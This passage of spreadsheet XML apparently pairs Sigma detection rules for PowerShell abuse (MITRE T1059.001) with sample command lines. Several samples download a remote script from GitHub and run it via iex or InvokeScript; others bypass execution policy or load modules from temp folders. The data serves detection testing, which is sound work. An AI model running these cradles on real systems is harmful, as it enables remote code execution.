    <row r="3787" ht="15.75" customHeight="1" s="42">
      <c r="A3787" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3787" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C3787" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D3787" s="43" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E3787" s="43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MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();[System.Management.Automation.Cmdlet]::InvokeCommand().InvokeScript($comMsXml.ResponseText)"</t>
        </is>
      </c>
      <c r="F3787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3787" s="43" t="n"/>
      <c r="J3787" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3787" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3788" ht="15.75" customHeight="1" s="42">
      <c r="A3788" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3788" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C3788" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D3788" s="43" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E3788" s="43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MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();(Get-Command iex).Invoke($comMsXml.ResponseText)"</t>
        </is>
      </c>
      <c r="F3788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3788" s="43" t="n"/>
      <c r="J3788" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3788" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3789" ht="15.75" customHeight="1" s="42">
      <c r="A3789" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3789" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C3789" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D3789" s="43" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E3789" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();$null = $comMsXml.ResponseText | iex"</t>
        </is>
      </c>
      <c r="F3789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3789" s="43" t="n"/>
      <c r="J3789" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3789" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3790" ht="15.75" customHeight="1" s="42">
      <c r="A3790" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3790" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C3790" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D3790" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E3790" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module '$Env:Temp\suspicious_module.psm1'"</t>
        </is>
      </c>
      <c r="F3790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3790" s="43" t="n"/>
      <c r="J3790" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3790" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3791" ht="15.75" customHeight="1" s="42">
      <c r="A3791" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3791" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C3791" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D3791" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E3791" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module $Env:Temp\\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F3791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3791" s="43" t="n"/>
      <c r="J3791" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3791" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3792" ht="15.75" customHeight="1" s="42">
      <c r="A3792" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3792" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C3792" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D3792" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E3792" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module ($Env:Temp + '\\suspicious_module.psm1')"</t>
        </is>
      </c>
      <c r="F3792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3792" s="43" t="n"/>
      <c r="J3792" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3792" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3793" ht="15.75" customHeight="1" s="42">
      <c r="A3793" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3793" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C3793" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D3793" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E3793" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "ipmo $Env:Temp\\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F3793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3793" s="43" t="n"/>
      <c r="J3793" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3793" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3794" ht="15.75" customHeight="1" s="42">
      <c r="A3794" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3794" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C3794" s="43" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D3794" s="43" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E3794" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module ($Env:AppData + '\\suspicious_module.psm1')"</t>
        </is>
      </c>
      <c r="F3794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3794" s="43" t="n"/>
      <c r="J3794" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3794" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3795" ht="15.75" customHeight="1" s="42">
      <c r="A3795" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3795" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3795" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3795" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3795" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host (\"[char]\" 0x41)"</t>
        </is>
      </c>
      <c r="F3795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3795" s="43" t="n"/>
      <c r="J3795" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3795" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3796" ht="15.75" customHeight="1" s="42">
      <c r="A3796" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3796" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3796" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3796" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3796" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F3796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3796" s="43" t="n"/>
      <c r="J3796" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3796" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3797" ht="15.75" customHeight="1" s="42">
      <c r="A3797" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3797" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3797" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3797" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3797" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F3797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3797" s="43" t="n"/>
      <c r="J3797" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3797" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3798" ht="15.75" customHeight="1" s="42">
      <c r="A3798" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3798" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3798" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3798" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3798" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]([Convert]::ToInt32(\"A\", 16)))"</t>
        </is>
      </c>
      <c r="F3798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3798" s="43" t="n"/>
      <c r="J3798" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3798" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3799" ht="15.75" customHeight="1" s="42">
      <c r="A3799" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3799" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3799" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3799" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3799" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char](0x41))"</t>
        </is>
      </c>
      <c r="F3799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3799" s="43" t="n"/>
      <c r="J3799" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3799" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3800" ht="15.75" customHeight="1" s="42">
      <c r="A3800" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3800" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3800" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3800" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3800" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -file "C:\Users\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F3800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3800" s="43" t="n"/>
      <c r="J3800" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3800" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3801" ht="15.75" customHeight="1" s="42">
      <c r="A3801" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3801" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3801" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3801" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3801" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -f "C:\Users\Public\script.ps1"</t>
        </is>
      </c>
      <c r="F3801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3801" s="43" t="n"/>
      <c r="J3801" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3801" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3802" ht="15.75" customHeight="1" s="42">
      <c r="A3802" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3802" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3802" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3802" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3802" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { . 'C:\Users\Public\script.ps1' }"</t>
        </is>
      </c>
      <c r="F3802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3802" s="43" t="n"/>
      <c r="J3802" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3802" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3803" ht="15.75" customHeight="1" s="42">
      <c r="A3803" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3803" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3803" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3803" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3803" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F3803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3803" s="43" t="n"/>
      <c r="J3803" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3803" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3804" ht="15.75" customHeight="1" s="42">
      <c r="A3804" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3804" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3804" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3804" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3804" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "%Public%\script.ps1"</t>
        </is>
      </c>
      <c r="F3804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3804" s="43" t="n"/>
      <c r="J3804" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3804" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3805" ht="15.75" customHeight="1" s="42">
      <c r="A3805" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3805" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3805" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3805" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3805" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "C:\Users\Public\script.ps1" -noprofile</t>
        </is>
      </c>
      <c r="F3805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3805" s="43" t="n"/>
      <c r="J3805" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3805" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3806" ht="15.75" customHeight="1" s="42">
      <c r="A3806" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3806" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_public_folder</t>
        </is>
      </c>
      <c r="C3806" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder</t>
        </is>
      </c>
      <c r="D3806" s="43" t="inlineStr">
        <is>
          <t>fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4</t>
        </is>
      </c>
      <c r="E3806" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "C:\Users\Public\script.ps1" -Command "&amp; 'C:\Users\Public\script.ps1'"</t>
        </is>
      </c>
      <c r="F3806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3806" s="43" t="n"/>
      <c r="J3806" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3806" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3807" ht="15.75" customHeight="1" s="42">
      <c r="A3807" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3807" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3807" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3807" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3807" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exec bypass -File script.ps1</t>
        </is>
      </c>
      <c r="F3807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3807" s="43" t="n"/>
      <c r="J3807" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3807" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3808" ht="15.75" customHeight="1" s="42">
      <c r="A3808" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3808" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3808" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3808" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3808" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File script.ps1</t>
        </is>
      </c>
      <c r="F3808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3808" s="43" t="n"/>
      <c r="J3808" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3808" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3809" ht="15.75" customHeight="1" s="42">
      <c r="A3809" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3809" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3809" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3809" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3809" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -File script.ps1</t>
        </is>
      </c>
      <c r="F3809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3809" s="43" t="n"/>
      <c r="J3809" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3809" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3810" ht="15.75" customHeight="1" s="42">
      <c r="A3810" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3810" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3810" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3810" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3810" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Unrestricted -File script.ps1</t>
        </is>
      </c>
      <c r="F3810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3810" s="43" t="n"/>
      <c r="J3810" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3810" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3811" ht="15.75" customHeight="1" s="42">
      <c r="A3811" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3811" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3811" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3811" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3811" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Unrestricted -File script.ps1</t>
        </is>
      </c>
      <c r="F3811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3811" s="43" t="n"/>
      <c r="J3811" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3811" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3812" ht="15.75" customHeight="1" s="42">
      <c r="A3812" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3812" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3812" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3812" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3812" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command Get-ExecutionPolicy</t>
        </is>
      </c>
      <c r="F3812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3812" s="43" t="n"/>
      <c r="J3812" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3812" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3813" ht="15.75" customHeight="1" s="42">
      <c r="A3813" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3813" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C3813" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D3813" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E3813" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -Command Get-ExecutionPolicy</t>
        </is>
      </c>
      <c r="F3813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3813" s="43" t="n"/>
      <c r="J3813" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3813" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3814" ht="15.75" customHeight="1" s="42">
      <c r="A3814" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
